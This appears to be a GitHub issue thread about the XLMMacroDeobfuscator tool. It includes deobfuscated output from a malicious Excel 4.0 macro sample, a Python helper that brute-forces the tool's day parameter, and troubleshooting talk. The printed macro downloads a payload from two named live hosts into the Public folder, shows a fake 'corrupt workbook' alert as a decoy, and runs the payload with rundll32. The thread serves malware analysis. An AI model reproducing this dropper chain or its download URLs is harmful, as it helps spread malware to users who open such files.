CELL:CN21650 , FullEvaluation , "http://xn--80agatbmcgncccbd9andd6w.xn--p1ai/wp-smart.php"
CELL:CN21651 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BH56678)
CELL:BH56678 , FullEvaluation , "http://ekhobrand.com/wp-smart.php"
CELL:BH56679 , FullEvaluation , GOTO(DK4305)
CELL:DK4305 , PartialEvaluation , FOPEN("""C:\Users\Public\Qv7vo.reg""")
CELL:DK4306 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BZ16571)
CELL:BZ16571 , PartialEvaluation , FPOS("""""""C:\Users\Public\Qv7vo.reg""""""",215)
CELL:BZ16572 , FullEvaluation , GOTO(HE17768)
CELL:HE17768 , PartialEvaluation , FREAD("""""""C:\Users\Public\Qv7vo.reg""""""",255)
CELL:HE17769 , FullEvaluation , GOTO(DB17200)
CELL:DB17200 , PartialEvaluation , FCLOSE("""""""C:\Users\Public\Qv7vo.reg""""""")
CELL:DB17201 , FullEvaluation , GOTO(BG55116)
CELL:BG55116 , NotImplemented , FILE.DELETE(R[-8553]C[151])
CELL:BG55117 , FullEvaluation , GOTO(DX38285)
CELL:DX38285 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-20517]C[85])),CLOSE(FALSE),)
CELL:DX38286 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GQ29178)
CELL:GQ29178 , FullEvaluation , "C:\Users\Public\DBoDYRP.html"
CELL:GQ29179 , FullEvaluation , GOTO(C7150)
CELL:C7150 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""","""C:\Users\Public\DBoDYRP.html""",0,0)
CELL:C7151 , FullEvaluation , GOTO(ES38374)
CELL:ES38374 , PartialEvaluation , FILES("""C:\Users\Public\DBoDYRP.html""")
CELL:ES38375 , FullEvaluation , GOTO(BN22175)
CELL:BN22175 , FullBranching , IF(ISERROR(R[16199]C[83]),CLOSE(FALSE),)
CELL:BN22175 , End , [TRUE] CLOSE(FALSE)
CELL:BN22175 , FullEvaluation , [FALSE]
CELL:BN22176 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EK37835)
CELL:EK37835 , FullEvaluation , "C:\Users\Public\3HylL.html"
CELL:EK37836 , FullEvaluation , GOTO(C65411)
CELL:C65411 , FullEvaluation , "C:\Users\Public\3HylL.html",DllRegisterServer
CELL:C65412 , FullEvaluation , GOTO(DJ40917)
CELL:DJ40917 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""http://xn--80agatbmcgncccbd9andd6w.xn--p1ai/wp-smart.php""","""C:\Users\Public\3HylL.html""",0,0)
CELL:DJ40918 , FullEvaluation , GOTO(GU56285)
CELL:GU56285 , PartialEvaluation , FILES("""C:\Users\Public\3HylL.html""")
CELL:GU56286 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AZ30462)
CELL:AZ30462 , FullBranching , IF(ISERROR(R[25823]C[151]),,RUN(R[-28301]C[128]))
CELL:AZ30462 , FullEvaluation , [TRUE]
CELL:AZ30463 , FullEvaluation , GOTO(EG21108)
CELL:EG21108 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""http://ekhobrand.com/wp-smart.php""","""C:\Users\Public\3HylL.html""",0,0)
CELL:EG21109 , FullEvaluation , GOTO(FX2161)
CELL:FX2161 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",2)
CELL:FX2162 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GA23393)
CELL:GA23393 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","""C:\Users\Public\3HylL.html"",DllRegisterServer",0,5)
CELL:GA23394 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BC22382)
CELL:BC22382 , End , CLOSE(FALSE)
CELL:AZ30462 , FullEvaluation , [FALSE] RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FX2161)
CELL:FX2161 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",2)
CELL:FX2162 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GA23393)
CELL:GA23393 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","""C:\Users\Public\3HylL.html"",DllRegisterServer",0,5)
CELL:GA23394 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BC22382)
CELL:BC22382 , End , CLOSE(FALSE)
time elapsed: 1.9966199398040771
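As an added example (not code from the XLMMacroDeobfuscator project), here is a small Python wrapper that answers the "bruteforce?" question above: it runs xlmdeobfuscator once per candidate day with the same -2 -n switches used in this thread and ranks the outputs, preferring runs whose FORMULA.FILL payloads are printable ASCII over runs with garbled text or parser errors. The scoring rule and the run_xlmdeobfuscator helper are my assumptions, not tool features, and the embedded outputs are constructed excerpts modelled on the two runs pasted here.

```python
"""Brute-force the -d (day) parameter for xlmdeobfuscator.

The sample in this thread derives its decoding keys from DAY(NOW()), so an
analyst who does not know which day the document was built for has to try each
candidate. The scoring below is a heuristic (an assumption of this example):
the right day gives FORMULA.FILL payloads that are printable ASCII and no
parser "Error" lines.
"""
import re
import subprocess
from typing import Callable, Dict, Iterable, Optional, Tuple

# Matches a FORMULA.FILL line and captures the decoded payload string.
FILL_RE = re.compile(r'FORMULA\.FILL\("(.*)",[^,]+\)\s*$')

# Constructed excerpts modelled on the wrong-day and -d 5 runs in this thread.
BAD_RUN = (
    'CELL:IG63410 , FullEvaluation ,FORMULA.FILL("=""Te workb7YV cûnĖot be0o8ened""",Sheet1!IJ30870)\n'
    'CELL:AM23759 , Error ,FORMULA.FILL("CHAR(BX12067-FB62566)CALL(""ShYll32""",Sheet1!BW48568)\n'
)
GOOD_RUN = (
    'CELL:IG63410 , FullEvaluation ,FORMULA.FILL("=""The workbook cannot be opened '
    'or repaired by Microsoft Excel because it\'s corrupt.""",Sheet1!IJ30870)\n'
    'CELL:GU23233 , FullEvaluation ,FORMULA.FILL("=""C:\\Windows\\system32\\rundll32.exe""",Sheet1!IG36768)\n'
)


def score_output(text: str) -> int:
    """Score one deobfuscator run: +1 per printable-ASCII FORMULA.FILL payload,
    -1 per payload containing non-ASCII, -10 per parser error line."""
    score = 0
    for line in text.splitlines():
        if line.startswith("Error:") or ", Error ," in line:
            score -= 10
            continue
        m = FILL_RE.search(line)
        if not m:
            continue
        payload = m.group(1)
        if payload.isascii() and payload.isprintable():
            score += 1
        else:
            score -= 1
    return score


def run_xlmdeobfuscator(sample: str, day: int) -> str:
    """Invoke the real tool (-2 = xlrd2 parser, -n = --no-ms-excel, -d = day)."""
    proc = subprocess.run(
        ["xlmdeobfuscator", "-2", "-n", "-f", sample, "-d", str(day)],
        capture_output=True, text=True, errors="replace")
    return proc.stdout + proc.stderr


def demo_runner(sample: str, day: int) -> str:
    """Offline stand-in for run_xlmdeobfuscator: only day 5 decodes cleanly."""
    return GOOD_RUN if day == 5 else BAD_RUN


def find_day(sample: str,
             runner: Callable[[str, int], str] = run_xlmdeobfuscator,
             days: Iterable[int] = range(1, 32)) -> Tuple[Optional[int], Dict[int, int]]:
    """Try every candidate day and return (best_day, {day: score})."""
    best_day, best_score = None, None
    scores: Dict[int, int] = {}
    for day in days:
        scores[day] = score_output(runner(sample, day))
        if best_score is None or scores[day] > best_score:
            best_day, best_score = day, scores[day]
    return best_day, scores


if __name__ == "__main__":
    # Replace demo_runner with run_xlmdeobfuscator to search a real sample.
    day, scores = find_day("Qi_7295.xls", runner=demo_runner)
    print(f"best day: {day}, scores: {scores}")
```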
Did you successfully install it on your mac?
If yes, I think you should now be able to use it without any problem. Are you facing any problem?
Note: please use --no-ms-excel
@Maijin add -d 5
(I don't see it on screen) I have tried that and it works; without that it doesn't
xlmdeobfuscator -2 -n -f Qi_7295.xls -d 5
<- this works on my mac
Weird
I tested the following xls on my mac: https://app.any.run/tasks/db6c055f-9308-461b-b69b-af067e5c30b3/#%20//content.any.run/tasks/db6c055f-9308-461b-b69b-af067e5c30b3/download/files/6e3bb0d6-ae8f-4272-9dd6-ae276005a627
What is your python version?
After investigating, it appeared that xlrd2 wasn't up to date, maybe the version number was still the same one for both the old and new version 🤷♂️.
I had to manually purge it with pip3 uninstall xlrd2
and reinstall it and now it works.
Thanks for the assistance, appreciate it!
That's great that you found the problem. That was a subtle bug! good catch.
Hello,
The following sample contains an XLM macro not detected by XLMMacroDeobfuscator (but olevba does):
Qi_7295.xls.zip
via https://twitter.com/DynamicAnalysis/status/1257715735662596097